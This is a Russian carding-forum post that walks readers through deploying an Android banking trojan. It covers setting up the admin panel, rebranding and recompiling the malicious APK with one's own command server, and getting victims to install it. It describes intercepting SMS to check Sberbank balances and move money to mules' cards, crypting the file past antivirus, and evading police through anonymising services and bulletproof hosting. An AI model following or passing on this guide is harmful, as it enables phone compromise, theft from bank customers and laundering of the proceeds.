Бот для развода владельцев Android

Carding

Professional
Messages
2,829
Reputation
17
Reaction score
2,087
Points
113
Нашел в своем загашнике довольно интересную схемку по сливу чужого бабла со счетов с помощью создания приложения для смартфонов на андроид. Хотя, по сути, можно получить доступ к смартфону, а как его использовать, решать как всегда вам. У самого так и не дошли руки заняться этой схемой, поэтому было бы интересно узнать от вас о результате.

Даже не буду перечислять, для чего можно использовать доступ к чужим смартфонам – это уж на что фантазии хватит. Все очень подробно расписано, поэтому не должно возникнуть проблем с реализацией. Тема очень интересная, но, к сожалению, просто не добрался до нее. Но мы же помним, что все материалы выкладываю исключительно для ознакомления ;)

Зачем нужен бот?

Бота можно использовать для разных целей. Но нас интересует деньги, так? Так. У бота есть функция перехвата смс. Допустим, 10 людей установили наше приложение на свой Андроид-телефон. Одному из них подключен мобильный банк Сбербанк. Даем боту команду отправки СМС на номер 900 с текстом БАЛАНС. Приходит СМС, смотрим есть ли деньги на карте. Можно чекнуть, есть ли еще карты, так как бывает, что карт, подключенных к мобильному банку, несколько. Все СМС-команды вы можете посмотреть на сайте банка. Допустим, поймали баланс 15 000р. Пишем СМС с текстом - "Перевод (номер карты дропа) 7000". Ну это чисто пример, чтобы вы поняли, как можно использовать бота.

Установка Андроид бота

Для начала идем на https://mchost.ru и регаем себе виртуальный хостинг. Берем самый простой тарифный план и бесплатный домен, нам ничего сверхъестественного не нужно. Не советую использовать другие хостинги, так как могут возникать ошибки. Лично я работал с макхостом, никаких проблем при работе не было. После того как зарегистрировали хостинг, качаем архив с ботом - https://goo.gl/sLaUb6. Пароль от архива - blackbiz.ws Теперь разархивируете содержимое архива. В нем еще три архива:

adminka.rar - здесь находится файлы для нашей админки

bot.rar - исходник Android-приложения (наш вирус)

database.rar - SQL файл для базы данных.

Разархивируем файл database.sql из архива database.rar. Заходим на хостинг, и создаем базу данных. Название базы пишите какое-угодно, пароль ставим надежный. НЕ ЗАБЫВАЕМ ПАРОЛЬ. Логин базы данных пишем такой же, как и имя базы. После того как создали базу, заходим в:

33cf3b21d8aa71b3e8657.png


Жмем "Выберите файл" и выбираем файл database.sql. Ничего больше не меняем, не трогаем. Жмем "Вперед" внизу страницы. На этом работа с БД закончена, выходим.

Далее нужно извлечь файлы из архива adminka.rar. Это будет наша админка – панель управления зараженными Android-устройствами. Открываем папку private. Тут нам нужен файл config.php. Редактировать его можно с любым текстовым редактором. Я использую Notepad++.

8c2c84adc0f42f3f2e114.png


SERVER - тут пишем хост нашей базы данных. Узнать его можно в разделе "Базы данных" на хостинге

DB - сюда пишем имя базы

USER - юзер базы. Совпадает с именем базы

PASSWORD - пароль от базы данных.

Зеленый текст не трогаем, это просто как пример, редактировать его не нужно. Сохраняем изменения, и закрываем файл. Больше ничего редактировать не нужно.

Теперь нужно загрузить все файлы, которые мы извлекали из архива adminka.rar, на хостинг. Для этого берем все папки, все файлы (вместе с той, в которой редактировали файл) и добавляем их в архив. Заходим на хостинг, и открываем "Файл менеджер". Откроется окно с папками, открываем папку "httpdocs" и жмем "Закачать файл". Загружаем только что созданный нами архив на хостинг. После загрузки, жмем "Распаковать архив". Закрываем менеджер. Загружать можно и иначе, это без разницы, смотрите сами как вам удобней, я описал самый простой вариант. После этих действий, можем заходить в админку. Если все правильно сделали, перед вами должна быть такая картина. Если таблички о успешном подключении к БД нет, идем назад на config.php и исправляем ошибки. Все должно быть точно так же как на картинке:

f8b65075b09b55c64a1ad.png


Можно закрывать хостинг. Админка настроена и готова для работы. Теперь нужно собрать наше приложение, наш вирус. Опять же, пойдем самым простым путем. Есть много вариантов, мы возьмем самое простое. Качаем программу Batch ApkTool - http://bursoftportable.blogspot.com/p/blog-page_23.html. Попробуйте запустить BatchApkTool.exe. Если не работает, обновите Java, и все заработает.

Идем дальше. Открываем архив bot.rar - папка "app" и извлекаем файл "app-release.apk". Копируем его в BatchApkTool, папка " INPUT_APK ". Запускаем BatchApkTool.exe и декомпилируем наш АПК файл. Для этого жмем клавишу "1" и Enter. После того как увидели надпись "ГОТОВО" зеленым текстом, можем закрывать программу. Открываем папку "INPUT_APK", и там вы должны видеть папку с названием "app-release". Заходим в эту папку, и переходим по пути: smali > com > example > livemusay > myapplication. В последней папке есть куча файлов. Нам нужно только 5 файлов:

delSoundSWS.smali

injectionActivity.smali

Press.smali

StartWhile.smali

b.smali

Все эти файлы кидаем в любой текстовый редактор (советую Notepad++). Теперь нам нужно будет прописать в этих файлах наш домен, на котором стоит админка. Если вы используйте Notepad++, то просто вбиваем в поиск по всем файлам текст "http://" Поиск выдаст нам места где нужно прописать наш домен:

fbc8cf4837d226cd6cf7c.png


Меняем домен http://probaand.mcdir.ru на свой. После того как в КАЖДОМ файле прописали свой домен, сохраняем изменения, и закрываем все файлы. Теперь нам нужно изменить иконку и название приложения. Делаем это через тот же BatchApkTool. Переходим на BatchApkTool\_INPUT_APK\app-release\res\values. И в папке "values" находим файл "strings.xml". Открываем его и редактируем:

6a1a8ef2281ae0ff467e0.png


Сохраняем изменения и закрываем.

Чтобы сменить иконку приложения, открываем папку "res". Там есть папки:

mipmap-hdpi-v4

mipmap-mdpi-v4

mipmap-xhdpi-v4

mipmap-xxhdpi-v4

mipmap-xxxhdpi-v4

В этих папках находится наша иконка. Качаем любую иконку (поиск в Google > Android icons). И просто в этих папках заменяем старую иконку на нашу новую. ВАЖНО - название иконки должно быть такое же, как и у старой иконки. Если старая иконка "ic_launcher", значит и свою новую иконку вы должны так же переименовать в "ic_launcher". Потом просто заменяем, и все.

Теперь можем рекомпилировать наш АПК. Он будет с нашей админкой, нашей иконкой, и с нашим названием. Для этого открываем BatchApkTool.exe. Жмем Рекомпилировать АПК. Клавиша "3", потом Enter. Дожидаемся пока программа рекомпилирует АПК, и закрываем ее. В папке "OUT_APK" лежит готовый АПК файл, настроен для работы. Кидаем его жертве и радуемся. Если все правильно сделали, то в админке сразу после того как кто-то наше приложение установит, будет видно телефон, модель, OC и так далее.

В админке с функциями я думаю разберетесь. Все просто, доступно, на русском. Для добавления команды, нужно поставить галочку на против бота, которому хотите дать команду, и нажать "Добавить команду" и там уже смотрите что хотите сделать с ботом. Отправить смс, USSD, запрос о разрешении отправки и чтении. Разрешение на отправку и чтение смс нужно только начиная от 6 Андроид. Это у всех ботов, с этим ничего не поделаешь. По своему опыту могу сказать, что из 10 как минимум 6 дает нам нужное разрешение.

По поводу самого бота хочу сказать, что это лишь демо-версия (руки не опускайте, я отлично сливал с этим ботом). Функции бот выполняет в лучшем виде, проблем нет. Автор бота maza-in. Если у кого будет желание, можно купить полную версию бота у автора. За контактами обращайтесь, скину.

У всех первым делом возникнет вопрос - где же брать эти установки нашего вируса? Как его впарить жертве? Тут все от вашей фантазии зависит, можно спамить, можно просто покупать эти установки у трафферов (ищите по форумам, их достаточно). Я сам гнал трафф из бирж. Ну это способ довольно сложный, и точно не бесплатный. Включаем фантазию и все будет ок :)

Еще один важный нюанс - наш файл палится антивирусами и его нужно криптовать. Крипт стоит 29$ в этом сервисе - http://31.44.189.15. Проверить детект файла можно в этом сервисе - https://nodistribute.com. VIRUSTOTAL МИМО! НИКОГДА НЕ ЧЕКАЙТЕ ТАМ ФАЙЛЫ! Сам я начинал без денег, даже рубля не было, и первые банки получил от спама, и без крипта. Поэтому, если у кого нет денег совсем, не переживайте, можно все провернуть и без вложений. Но с мозгами.

Анонимность

Наверное, всем будет интересно, как работать, чтобы вас не спалили. В первую очередь хочу сказать, что можно использовать VPN, SOCKS, виртуалки, дедики - все равно, если нужно будет, вас найдут. Интернет-анонимность – это миф. Те, кто хотят себя подстраховать, читаем дальше…

Допустим, вам удалось слить деньги. Жертва звонит в банк, идет в полицию, пишет заявку. Допустим (что вообще нереально), менты взялись за дело. Повторю, это нереально, и 99,9% что такого не будет. Как же они будут вас искать? Будут искать дропов, но тут я думаю все понятно. Дроп вас даже в лицо не видел, кто вы и что, не знает. Поехали дальше. Берут телефон жертвы, чекают на вирусы. Быстренько находят наше приложение, разбирают его, и находят домен к которому мы прикрутили наш АПК. У них уже есть наш домен, а дальше дело техники. Просто показывают нашему хостинг провайдеру наш домен, и провайдер выдает наши логи. Получив логи, они уже обращаются к нашему интернет провайдеру. Дальше по старинке, ОМОН выносит дверь, вас забирают, ну и начинаются посиделки на нарах. Что нам нужно для анонимности - любой хостинг, но регать его с VPN, дед, SSH, виртуалка, SOCKS. Тут сами смотрите, что по душе. Лучше если все это вместе сразу. То есть только после того как подключили все нужные материалы анонимности, только тогда заходим на сайт хостинга, и берем себе хост. Почту, на которую будем регать хостинг, создаем тоже только когда подключили и убедились в анонимности. Таким путем мы убираем наши логи, и та часть ментов которая взялась за это дело, увидев VPN, забьет на это дело. Второй вариант, сразу взять хостинг без логов, абузоустойчивый хостинг, который зарегистрирован в стране, где логи держать не является законом. К примеру, Панама. Этот вариант будет дороже, так как цены на такие хостинги начиная с 30$ до 300$. Бывают и дороже. С дропами общение вести только в Jabber, с включенным OTR шифрованием. Искать дропов можете на любых форумах, их полно. Советую работать именно с сервисами обнала, так как там люди все-таки опытней, и процент у них меньше. Не надежный дроп берет 20-30%. Надежный сервис 5-8%. Ну, если вы все-таки будете искать именно дропов, то советую работать с девушками. Они надежней, и иногда лучше понимают, что от них хотят. Проверено.

Могу только добавить от себя, что все ссылки на сервисы и ресурсы приведены для примера, и их смена не должна повлиять на работу, естественно, при соблюдении всех условий.

Всем удачи и побольше нубов на пути, ведь именно они нужны для хорошего профита в данной схеме!
 
Top